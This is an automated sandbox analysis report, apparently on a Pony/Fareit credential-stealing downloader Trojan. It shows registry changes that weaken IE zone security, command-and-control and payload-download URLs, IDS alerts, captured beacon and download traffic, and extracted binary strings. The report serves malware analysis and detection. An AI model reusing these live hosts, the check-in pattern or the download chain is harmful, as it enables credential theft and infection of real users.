[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"p.exe" = "p"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process ie.exe:1472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 97 EA A0 F7 6D 35 E5 6F 6F 65 46 33 7A 97 6A"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\TEMP\IE9B6.tmp\SQMAPI.DLL,"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: fewfwefewfwe
Product Name: j45j54j445j4j45
Product Version: 1.0.0.11
Legal Copyright: wefwefwe
Legal Trademarks: 22h4j4
Original Filename: jh45j4j5
Internal Name: fewfwfwefwef
File Version: 8.9.4.1
File Description: fwefwefewfwefwef
Comments:
Language: Language Neutral

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://84.201.32.74/pony/gate.php
hxxp://ge.tt/api/1/files/71MPY782/0/blob?download	54.195.252.180
hxxp://open.ge.tt/1/files/71MPY782/0/blob?download
hxxp://s3-3-w.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475
hxxp://ge.tt/api/1/files/7Pbxr582/0/blob?download	54.195.252.180
hxxp://open.ge.tt/1/files/7Pbxr582/0/blob?download
hxxp://s3-3-w.amazonaws.com/gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482
hxxp://a767.dscms.akamai.net/download/7/B/D/7BD95543-D8A7-474F-8A79-34DE266AAC27/IE9-Windows7-x86-ptb.exe
hxxp://s3.kkloud.com.s3.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475	54.231.136.26
hxxp://w865553.open.ge.tt/1/files/71MPY782/0/blob?download	54.247.122.87
hxxp://w007363.open.ge.tt/1/files/7Pbxr582/0/blob?download	54.247.122.87
hxxp://download.microsoft.com/download/7/B/D/7BD95543-D8A7-474F-8A79-34DE266AAC27/IE9-Windows7-x86-ptb.exe	72.246.43.8
hxxp://bigbone10.info/pony/gate.php
hxxp://s3.kkloud.com.s3.amazonaws.com/gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482	54.231.136.26
mail.google.com	74.125.226.85
ssl.gstatic.com	74.125.226.79
paco2015.ddns.net	65.181.118.218
accounts.google.com	173.194.76.84
fonts.gstatic.com	173.194.68.94

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Trojan Generic - POST To gate.php with no referer
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
ET TROJAN Fareit/Pony Downloader Checkin 2
ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98
ET TROJAN Generic -POST To gate.php w/Extended ASCII Characters
ET POLICY Executable served from Amazon S3

Traffic

POST /pony/gate.php HTTP/1.0

Host: bigbone10.info

Accept: */*

Accept-Encoding: identity, *;q=0

Content-Length: 432

Connection: close

Content-Type: application/octet-stream

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

...WP........0.;[email protected]
..*B.r0.q.N.......,.........
...i...|...#^.nG..5....YK..1......C...6.31.[...h*.7^...........Fz8e.Hc..8v..

[email protected][email protected].%VJ....e:...`.F~....9.T.X.6.a.1...N...6.a.A......v[.I..M...>x.i....C.{,.z5.2.2...6.)..l...nc..!.tV....\.J......^S..G.V.9.q*.Y..F..C..'-[n4..y.}.b..;V/...].....]^>_....c.^...L.i>..........J.......Cg...-..>}......./6.W.j.2......g.....5..4.D..
HTTP/1.1 404 Not Found

Date: Fri, 16 Jan 2015 17:59:56 GMT

Server: Apache

Content-Length: 275

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /po
ny/gate.php was not found on this server.</p>.<hr>.<add
ress>Apache Server at bigbone10.info Port 80</address>.</b
ody></html>...

POST /pony/gate.php HTTP/1.0

Host: bigbone10.info

Accept: */*

Accept-Encoding: identity, *;q=0

Content-Length: 432

Connection: close

Content-Type: application/octet-stream

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

...WP........0.;[email protected]
..*B.r0.q.N.......,.........
...i...|...#^.nG..5....YK..1......C...6.31.[...h*.7^...........Fz8e.Hc..8v..

[email protected][email protected].%VJ....e:...`.F~....9.T.X.6.a.1...N...6.a.A......v[.I..M...>x.i....C.{,.z5.2.2...6.)..l...nc..!.tV....\.J......^S..G.V.9.q*.Y..F..C..'-[n4..y.}.b..;V/...].....]^>_....c.^...L.i>..........J.......Cg...-..>}......./6.W.j.2......g.....5..4.D..
HTTP/1.1 404 Not Found

Date: Fri, 16 Jan 2015 17:59:45 GMT

Server: Apache

Content-Length: 275

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /po
ny/gate.php was not found on this server.</p>.<hr>.<add
ress>Apache Server at bigbone10.info Port 80</address>.</b
ody></html>...

POST /pony/gate.php HTTP/1.0

Host: bigbone10.info

Accept: */*

Accept-Encoding: identity, *;q=0

Content-Length: 432

Connection: close

Content-Type: application/octet-stream

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

...WP........0.;[email protected]
..*B.r0.q.N.......,.........
...i...|...#^.nG..5....YK..1......C...6.31.[...h*.7^...........Fz8e.Hc..8v..

[email protected][email protected].%VJ....e:...`.F~....9.T.X.6.a.1...N...6.a.A......v[.I..M...>x.i....C.{,.z5.2.2...6.)..l...nc..!.tV....\.J......^S..G.V.9.q*.Y..F..C..'-[n4..y.}.b..;V/...].....]^>_....c.^...L.i>..........J.......Cg...-..>}......./6.W.j.2......g.....5..4.D..
HTTP/1.1 404 Not Found

Date: Fri, 16 Jan 2015 17:59:50 GMT

Server: Apache

Content-Length: 275

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /po
ny/gate.php was not found on this server.</p>.<hr>.<add
ress>Apache Server at bigbone10.info Port 80</address>.</b
ody></html>...

GET /api/1/files/71MPY782/0/blob?download HTTP/1.1

Host: ge.tt

Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect

location: hXXp://w865553.open.ge.tt/1/files/71MPY782/0/blob?download

Connection: keep-alive

Transfer-Encoding: chunked
0......


GET /api/1/files/7Pbxr582/0/blob?download HTTP/1.1

Host: ge.tt

HTTP/1.1 307 Temporary Redirect

location: hXXp://w007363.open.ge.tt/1/files/7Pbxr582/0/blob?download

Connection: keep-alive

Transfer-Encoding: chunked
0..

GET /download/7/B/D/7BD95543-D8A7-474F-8A79-34DE266AAC27/IE9-Windows7-x86-ptb.exe HTTP/1.1

Host: download.microsoft.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Tue, 08 Mar 2011 16:50:16 GMT

Accept-Ranges: bytes

ETag: "9c61fee6b0ddcb1:0"

Server: Microsoft-IIS/8.0

Content-Disposition: attachment

Content-Length: 18666800

Date: Fri, 16 Jan 2015 18:00:15 GMT

Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......S.....a...a.
..a.x.....a.x...].a.x.....a.x.....a...`.2.a.x.....a.0.....a.x.....a.x.
....a.Rich..a.........PE..L...Q(vM............................kv......
.................................p............@...... ................
[email protected]...................
................@...............H............................text.....
.......................... ..`.data...............................@...
.rsrc...D...........................@[email protected]................
[email protected]............................................................
......................................................................
......................................................................
......................................................................
......................................................................
........................................................$...2...H...Z.
..j.......................N...P...H...S.......L...I.......d.......r...
d...T........... ...4...F...X...r.....................................
..<...R...^...n.......................................$.......L...Z
...j...|.......................................0...F...V.......z......
.............................................8........................
.......t...d...H...................................p...V...J...>...
2...............r...h.......0...H...\...6.........................
<<< skipped >>>

GET /1/files/71MPY782/0/blob?download HTTP/1.1

Host: w865553.open.ge.tt

Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect

location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475

connection: keep-alive

transfer-encoding: chunked
0..HTTP/1.1 307 Temporary Redirect..location: hXXp://s3.kkloud.com.s3.
amazonaws.com/gett/71MPY782/modulo?response-content-disposition=attach
ment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOP
ceIH+TTA3Ug=&Expires=1421431475..connection: keep-alive..transfer-
encoding: chunked..0..

GET /gett/71MPY782/modulo?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=aaqxkxBvNuGMZHOPceIH+TTA3Ug=&Expires=1421431475 HTTP/1.1

Host: s3.kkloud.com.s3.amazonaws.com

Connection: Keep-Alive

HTTP/1.1 200 OK

x-amz-id-2: ER3qduBuOtTHZsiy6kvZfJiqpYM 1pe1huMNfRFLM fDEW30G/2N8pXXGB2KHtLnrWihtk2q84w=

x-amz-request-id: 51861B5045830B3C

Date: Fri, 16 Jan 2015 17:59:54 GMT

Content-Disposition: attachment;

Last-Modified: Wed, 14 Jan 2015 14:49:40 GMT

ETag: "23fdcb8fdaf546b5884e31efad4d5711-1"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Content-Length: 1351680

Server: AmazonS3
OX......................B.............................................
..#..N.#Vjkq"rpmepco"acllmv"`g"pwl"kl"FMQ"omfg,...&.............s...s.
..s.(.~...s.).w...s.Pkaj..s.................RG..N....X.V...........#..
...2...R...............B..............................................
.........................5......V7..*....2.......................B..2B
..........................................R...".......B...............
............,vgzv....*.......2.................."..b,fcvc........B....
..................B...,pqpa........2.......B..............B..B,pgnma..
[email protected]@TO42,FNN..........
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>

GET /gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482 HTTP/1.1

Host: s3.kkloud.com.s3.amazonaws.com

HTTP/1.1 200 OK

x-amz-id-2: xUwL2Dp4fTDppWyne6Xs/XKnAuLZg3pknIIfT0mVztfcQKSV73H4LO9L1r4vI1wbMvadtWBcpfY=

x-amz-request-id: 0F3CB638CF0CD829

Date: Fri, 16 Jan 2015 18:00:00 GMT

Content-Disposition: attachment;

Last-Modified: Wed, 07 Jan 2015 01:08:59 GMT

ETag: "0e03064e0247e969aa256eaf1bf4ddc5-1"

Accept-Ranges: bytes

Content-Type: application/octet-stream

Content-Length: 126800

Server: AmazonS3
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...V.\J
...........#.........................0....."..........................
....... ..............................P [email protected]..........
....P.................................................................
...........................text............ .......... .....U. ..`.dat
a...:[email protected][email protected]...@............
[email protected]........ [email protected]........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>

GET /1/files/7Pbxr582/0/blob?download HTTP/1.1

Host: w007363.open.ge.tt

Connection: Keep-Alive

HTTP/1.1 307 Temporary Redirect

location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/7Pbxr582/MSWINSCK.OCX?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=chisXchTVSIgeHHvcCSonuUKCy0=&Expires=1421431482

connection: keep-alive

transfer-encoding: chunked
0..

POST /pony/gate.php HTTP/1.0

Host: bigbone10.info

Accept: */*

Accept-Encoding: identity, *;q=0

Content-Length: 432

Connection: close

Content-Type: application/octet-stream

Content-Encoding: binary

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

...WP........0.;[email protected]
..*B.r0.q.N.......,.........
...i...|...#^.nG..5....YK..1......C...6.31.[...h*.7^...........Fz8e.Hc..8v..

[email protected][email protected].%VJ....e:...`.F~....9.T.X.6.a.1...N...6.a.A......v[.I..M...>x.i....C.{,.z5.2.2...6.)..l...nc..!.tV....\.J......^S..G.V.9.q*.Y..F..C..'-[n4..y.}.b..;V/...].....]^>_....c.^...L.i>..........J.......Cg...-..>}......./6.W.j.2......g.....5..4.D..
HTTP/1.1 404 Not Found

Date: Fri, 16 Jan 2015 17:59:39 GMT

Server: Apache

Content-Length: 275

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /po
ny/gate.php was not found on this server.</p>.<hr>.<add
ress>Apache Server at bigbone10.info Port 80</address>.</b
ody></html>...

The Trojan connects to the servers at the folowing location(s):

.text

`.itext

`.data

.idata

.didata

.rdata

@.reloc

B.rsrc

biClrImportant

tagMSG

Windows

HKEY

TWMKey

KeyData

etNoMonitorSupportException

TArray<System.Byte>

ENoMonitorSupportException

ENoMonitorSupportExceptionL

TArray<SysUtils.TLangRec>

TArray<System.Char>

csshiftjis

windows-936

windows-1250

windows-1251

windows-1252

windows-1253

windows-1254

windows-1255

windows-1256

windows-1257

windows-1258

windows-874

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

TArray<SysUtils.TUnitHashEntry>

grfLocksSupported

Operator

EVariantBadIndexError

ssShift

htKeyword

EInvalidOperation

TList.TDirection

AOperator

TThread.TSynchronizeRecord

TOperation

Operation

FOnExecute

OnExecuteh(C

TArray<System.string>

TArray<System.TObject>

TList.Sort$876$0$Intfh

TList.Sort$876$ActRec

TList.Sort$876$ActRec4

$TComponent.FindComponent$1499$0$Intfh

$TComponent.FindComponent$1499$ActRec

$TComponent.FindComponent$1499$ActRecx

TRegKeyInfo

NumSubKeys

MaxSubKeyLen

FCurrentKey

FRootKey

FCloseRootKey

CloseKey

CreateKey

DeleteKey

GetKeyInfo

GetKeyNames

HasSubKeys

KeyExists

LoadKey

MoveKey

OpenKey

OpenKeyReadOnly

ReplaceKey

RestoreKey

SaveKey

UnLoadKey

CurrentKey\

LastErrorMsg

RootKey\

RootKeyName

EInvalidGraphicOperation

SupportsPartialTransparency

SupportsClipboardFormat

Monochrome@cE

IsShortCut

FHelpKeyword

HelpKeyword

igoParentPassthrough

FAlwaysShowDragImages

AlwaysShowDragImages

toFlickFallbackKeys

'TCustomGestureEngine.TGestureEngineFlag

(TCustomGestureEngine.TGestureEngineFlags

Supported

TKeyEvent

TKeyPressEvent

FOnKeyDown

FOnKeyPress

FOnKeyUp

IsHintMsg

FNativeWheelSupport

FWheelSupportMessage

thHeaderItemLeftPressed

tsArrowBtnLeftPressed

ttbThumbLeftPressed

lrMonoChrome

FAutoHotkeys

RethinkHotkeys

AutoHotkeys

AutoHotkeysD

UnderstandsKeyword

poPortrait

APort

Port

FPasswordChar

PasswordChar

OnKeyDown

OnKeyPress

OnKeyUp\

ssHorizontal

TCustomButton.TButtonStyle

FProportional

Proportional

ssHotTrack

TWindowState

poProportional

fsShowing

FWindowState

FKeyPreview

WantChildKey

KeyPreview@

WindowState

KeyPreview0

FBiDiKeyboard

FNonBiDiKeyboard

FEnumAllWindowsOnActivateHint

FOnActionExecute

Keyword

EnumAllWindowsOnActivateHint\

BiDiKeyboard\

NonBiDiKeyboard

OnActionExecute@VF

AMsg

EIdCanNotBindPortInRange

EIdCanNotBindPortInRangeh

EIdInvalidPortRangeH

EIdInvalidPortRange$

Uh%uL

CheckIPVersionSupport

WSGetServByPort

APortNumber

VPort

IdStackWindows

TIdSocketListWindows4

TIdSocketListWindows

TIdStackWindowsg

ReceiveMsg

WSTranslateSocketErrorMsg

SupportsIPv6

TIdStackWindows

EIdIPVersionUnsupported

ReceiveMsg,

EIdPortRequired

EIdTCPConnectionError

EIdObjectTypeNotSupported

IPAsString

QuoteHTTP

Password

IdHTTPHeaderInfo

FPassword

FPort

ProxyPassword

ProxyPort\

Password\

FMetaHTTPEquiv

TIdMetaHTTPEquivE

ProcessMetaHTTPEquiv

TIdMetaHTTPEquiv

ftpTransfer

ftpReady

ftpAborted

VMsgEnd

FClientPortMin

FClientPortMax

FPeerPort

ClientPortMin

ClientPortMax\

PeerPort

"EIdTransparentProxyUDPNotSupported

OpenUDP

CloseUDP

RecvFromUDP

SendToUDPm

FLastCmdResult

TIdTCPConnectionB

RaiseExceptionForLastCmdResult

SendCmd

SendCmdf

TIdTCPConnection

IdTCPConnection

LastCmdResult

FBoundPort

FBoundPortMax

FBoundPortMin

TIdTCPClientCustom'

TIdTCPClientCustom

IdTCPClient

BoundPort

BoundPortMax

BoundPortMin

TIdTCPClient

%EIdSocksUDPNotSupportedBySOCKSVersion

%EIdSocksUDPNotSupportedBySOCKSVersionx7P

saUsernamePassword

FUDPSocksAssociation

SendToUDP9

FDefaultPort

DefaultPort

BoundPortMinh(C

fPassThrough

PassThrough

MakeFTPSvrPort

MakeFTPSvrPasv

FURL

CompressFTPDeflate

CompressFTPToIO

DecompressFTPFromIO

DecompressFTPDeflate

CompressHTTPDeflate

DecompressHTTPDeflate

URLDecode

URLEncode

Port\

FHttpOnly

HttpOnly\

FCommentURL

FPortList

FRecvPort

FUsePort

CommentURL

PortCount

UsePort

RecvPort

AURL

rsa_keygen

dsa_keygen

pub_key

priv_key

PEVP_PKEY

EVP_PKEY_union

EVP_PKEY

pkey

pkey_type

required_pkey_type

key_len

key_length

AUTHORITY_KEYID

keyid

PAUTHORITY_KEYIDh

X509_PUBKEY

public_key

PX509_PUBKEY`

X509_CERT_AUX

PX509_CERT_AUX

cert_info

ex_nscert

get_cert_methods

cert_crl

ppem_password_cb

key_arg_length

key_arg

master_key_length

master_key

sess_cert

Ptlsext_ticket_key_cb!

cert_store

default_passwd_callback

default_passwd_callback_userdata

client_cert_cb

extra_certs

max_cert_list

cert

msg_callback

msg_callback_arg

client_cert_engine

tlsext_tick_key_name

tlsext_tick_hmac_key

tlsext_tick_aes_key

tlsext_ticket_key_cb

init_msg

read_key

write_key

key_material_length

key_material

tmp_cert_type

tmp_cert_length

tmp_cert_verify_md

tmp_cert_req

tmp_key_block_length

tmp_key_block

tmp_cert_request

msg_len

w_msg_hdr

r_msg_hdr

sslvrfFailIfNoPeerCert

TCallbackExEvent

TPasswordEvent

TPasswordEventEx

VPassword

Certificate

fsRootCertFile

fsCertFile

fsKeyFile

RootCertFile\

CertFile\

KeyFile

LoadRootCert

LoadCert

fPeerCert

PeerCert

fOnGetPassword

fOnGetPasswordEx

OnGetPassword

OnGetPasswordEx

EIdOSSLLoadingRootCertError

EIdOSSLLoadingRootCertErrorpVR

EIdOSSLLoadingCertErrorXWR

EIdOSSLLoadingCertError0WR

EIdOSSLLoadingKeyError

SEC_GET_KEY_FN

KeyVer

pGetKeyFn

pvGetKeyArgument

EXPORT_SECURITY_CONTEXT_FN&

IMPORT_SECURITY_CONTEXT_FN_W(

ExportSecurityContext

ImportSecurityContextW

aPassword

6h|%S

TIdHTTPConnectionType

IdHTTP

TIdHTTPOption

TIdHTTPOptions

TIdHTTPProtocolVersion

TIdHTTPOnRedirectEvent

TIdHTTPOnHeadersAvailable

FHTTP

TIdHTTPResponse7

TIdHTTPResponse

TIdHTTPRequest5

AHTTP

TIdHTTPRequest

TIdHTTPProtocol;

TIdHTTPProtocolx4S

FHTTPProto

TIdCustomHTTP'

TIdCustomHTTP

MetaHTTPEquiv

HTTPOptions -S

TIdHTTP|FS

TIdHTTP

EIdHTTPProtocolExceptionn

EIdHTTPProtocolException

IFontAccessh

IPictureAccessh

LicenseKey

IWebBrowser

IWebBrowserApp

IWebBrowser2

TWebBrowserStatusTextChange

TWebBrowserProgressChange

TWebBrowserCommandStateChange

TWebBrowserTitleChange

TWebBrowserPropertyChange

TWebBrowserBeforeNavigate2

TWebBrowserNewWindow2

TWebBrowserNavigateComplete2

TWebBrowserDocumentComplete

TWebBrowserOnVisible

TWebBrowserOnToolBar

TWebBrowserOnMenuBar

TWebBrowserOnStatusBar

TWebBrowserOnFullScreen

TWebBrowserOnTheaterMode

TWebBrowserWindowSetResizable

TWebBrowserWindowSetLeft

TWebBrowserWindowSetTop

TWebBrowserWindowSetWidth

TWebBrowserWindowSetHeight

TWebBrowserWindowClosing

TWebBrowserClientToHostWindow

TWebBrowserSetSecureLockIcon

TWebBrowserFileDownload

TWebBrowserNavigateError

%TWebBrowserPrintTemplateInstantiation

TWebBrowserPrintTemplateTeardown

TWebBrowserUpdatePageStatus

%TWebBrowserPrivacyImpactedStateChange

FOnWindowSetResizable

FOnWindowSetLeft

FOnWindowSetTop

FOnWindowSetWidth

FOnWindowSetHeight

TWebBrowser&

cmdID

cmdexecopt

TWebBrowser

OnWindowSetResizable

OnWindowSetLeft$0T

OnWindowSetTop

OnWindowSetWidth

OnWindowSetHeight

LocationURL

UhCrT

EInvalidGridOperation

goAlwaysShowEditor

Generics.Defaults

Generics.Collections

UrlMon

IdTCPServer

IdCustomTCPServer

#!V!W!"!&!r%!%#%%%'%)%c%e%g%C%<!"%$%&%(%*% %-%/%1%3%5%7%9%;$=%?%A%D%F%H%J%K%L%M%N%O%R%U%X%[%^%_%`%a%b%d%f%h%i%j%k%l%m%o%s% !,!

P%S%V%Y%\%

?456789:;<=

!"#$%&'()* ,-./0123

oleaut32.dll

advapi32.dll

RegOpenKeyExW

RegCloseKey

user32.dll

kernel32.dll

UnhookWindowsHookEx

SetWindowsHookExW

SetKeyboardState

MsgWaitForMultipleObjectsEx

MsgWaitForMultipleObjects

MapVirtualKeyW

LoadKeyboardLayoutW

GetKeyboardState

GetKeyboardLayoutNameW

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyState

GetKeyNameTextW

EnumWindows

EnumThreadWindows

EnumChildWindows

ActivateKeyboardLayout

msimg32.dll

gdi32.dll

SetViewportOrgEx

SetViewportExtEx

version.dll

GetCPInfoExW

GetCPInfo

RegUnLoadKeyW

RegSaveKeyW

RegRestoreKeyW

RegReplaceKeyW

RegQueryInfoKeyW

RegLoadKeyW

RegFlushKey

RegEnumKeyExW

RegDeleteKeyW

RegCreateKeyExW

ole32.dll

comctl32.dll

winspool.drv

URLMON.DLL

URLDownloadToFileW

shell32.dll

windowscodecs.dll

uxtheme.dll

DWMAPI.DLL

1$1$0,0004080

>#>'> >/>3>

7#7'7 7/73777

0D1r1D3H3L3P3T3X3\3`3d3h3l3p3t3%4U4>6

7v7D7}7

0-0K0Y0g0}0

=(=,=<=[=|=

>~> ?@?[?

7v7D7

8"8&8*8.828

?$?[?_?}?

3<3Q3b3r3

: :$:(:,:0:4:8:<:\:|:

0 0$0(0,0004080`0

6 6(60686@6

4D4F4[4i4y4

8ƒ8D8[8i8y8

3?3l3

: :?:[:{:

-060Q0g0}0

<!=.=>=^=

090=0\0`0

9!9œ9G9K9h9l9p9

10141[1_1

25292\2`2

3 3?3^3~3

KWindows

CGenerics.Defaults

0IdHTTPHeaderInfo

 IdTCPServer

Font.Charset

Font.Color

Font.Height

Font.Name

Font.Style

Picture.Data

%u,vb

v w.RXd

56Ba %CRbq

-7b1%u$

^%f D

t%Ud8uY

r%1U(

$u%F)`

$xP%f

.Ki[%

.qms$

5.RVXL

y".AG}

#%CQt

NA

>#w*.yb

%D]tcbJ]

Lines.Strings

ProxyParams.BasicAuthentication

ProxyParams.ProxyPort

Request.ContentLength

Request.ContentRangeEnd

Request.ContentRangeStart

"Request.ContentRangeInstanceLength

Request.Accept

Request.BasicAuthentication

Request.UserAgent

&Mozilla/3.0 (compatible; Indy Library)

Request.Ranges.Units

Request.Ranges

HTTPOptions

S5%DO

#A%d"

ûTq

z3I%.vr\

,,6%dri

%DScp

version="15.0.3890.34076"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<requestedExecutionLevel

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

C:\Builds\TP\rtl\sys\SysUtils.pas

%s-%s

C:\Builds\TP\rtl\common\TypInfo.pas

%s[%d]

%s_%d

.Owner

C:\Builds\TP\rtl\common\Classes.pas

C:\Builds\TP\rtl\common\SyncObjs.pas

\\?\UNC\

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_CURRENT_CONFIG

HKEY_DYN_DATA

%s (*.%s)|*.%1:s

%s (%s)|%1:s|

SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes

crSQLWait

%s (%s)

imm32.dll

\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\

clWebSnow

clWebFloralWhite

clWebLavenderBlush

clWebOldLace

clWebIvory

clWebCornSilk

clWebBeige

clWebAntiqueWhite

clWebWheat

clWebAliceBlue

clWebGhostWhite

clWebLavender

clWebSeashell

clWebLightYellow

clWebPapayaWhip

clWebNavajoWhite

clWebMoccasin

clWebBurlywood

clWebAzure

clWebMintcream

clWebHoneydew

clWebLinen

clWebLemonChiffon

clWebBlanchedAlmond

clWebBisque

clWebPeachPuff

clWebTan

clWebYellow

clWebDarkOrange

clWebRed

clWebDarkRed

clWebMaroon

clWebIndianRed

clWebSalmon

clWebCoral

clWebGold

clWebTomato

clWebCrimson

clWebBrown

clWebChocolate

clWebSandyBrown

clWebLightSalmon

clWebLightCoral

clWebOrange

clWebOrangeRed

clWebFirebrick

clWebSaddleBrown

clWebSienna

clWebPeru

clWebDarkSalmon

clWebRosyBrown

clWebPaleGoldenrod

clWebLightGoldenrodYellow

clWebOlive

clWebForestGreen

clWebGreenYellow

clWebChartreuse

clWebLightGreen

clWebAquamarine

clWebSeaGreen

clWebGoldenRod

clWebKhaki

clWebOliveDrab

clWebGreen

clWebYellowGreen

clWebLawnGreen

clWebPaleGreen

clWebMediumAquamarine

clWebMediumSeaGreen

clWebDarkGoldenRod

clWebDarkKhaki

clWebDarkOliveGreen

clWebDarkgreen

clWebLimeGreen

clWebLime

clWebSpringGreen

clWebMediumSpringGreen

clWebDarkSeaGreen

clWebLightSeaGreen

clWebPaleTurquoise

clWebLightCyan

clWebLightBlue

clWebLightSkyBlue

clWebCornFlowerBlue

clWebDarkBlue

clWebIndigo

clWebMediumTurquoise

clWebTurquoise

clWebCyan

clWebPowderBlue

clWebSkyBlue

clWebRoyalBlue

clWebMediumBlue

clWebMidnightBlue

clWebDarkTurquoise

clWebCadetBlue

clWebDarkCyan

clWebTeal

clWebDeepskyBlue

clWebDodgerBlue

clWebBlue

clWebNavy

clWebDarkViolet

clWebDarkOrchid

clWebMagenta

clWebDarkMagenta

clWebMediumVioletRed

clWebPaleVioletRed

clWebBlueViolet

clWebMediumOrchid

clWebMediumPurple

clWebPurple

clWebDeepPink

clWebLightPink

clWebViolet

clWebOrchid

clWebPlum

clWebThistle

clWebHotPink

clWebPink

clWebLightSteelBlue

clWebMediumSlateBlue

clWebLightSlateGray

clWebWhite

clWebLightgrey

clWebGray

clWebSteelBlue

clWebSlateBlue

clWebSlateGray

clWebWhiteSmoke

clWebSilver

clWebDimGray

clWebMistyRose

clWebDarkSlateBlue

clWebDarkSlategray

clWebGainsboro

clWebDarkGray

clWebBlack

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

C:\Builds\TP\indysockets\lib\system\IdStreamVCL.pas

C:\Builds\TP\indysockets\lib\system\IdGlobal.pas

%s, %.2d %s %.4d %s %s

%s, %.2d-%s-%.2d %s %s

WS2_32.DLL

getservbyport

WSAAsyncGetServByPort

WSAJoinLeaf

MSWSOCK.DLL

WSARecvMsg

WSASendMsg

Wship6.dll

Fwpuclnt.dll

127.0.0.1

C:\Builds\TP\indysockets\lib\system\IdStack.pas

ISO_646.irv:1991

ISO_646.basic:1983

ISO_646.irv:1983

csISO16Portuguese

csISO84Portuguese2

csShiftJIS

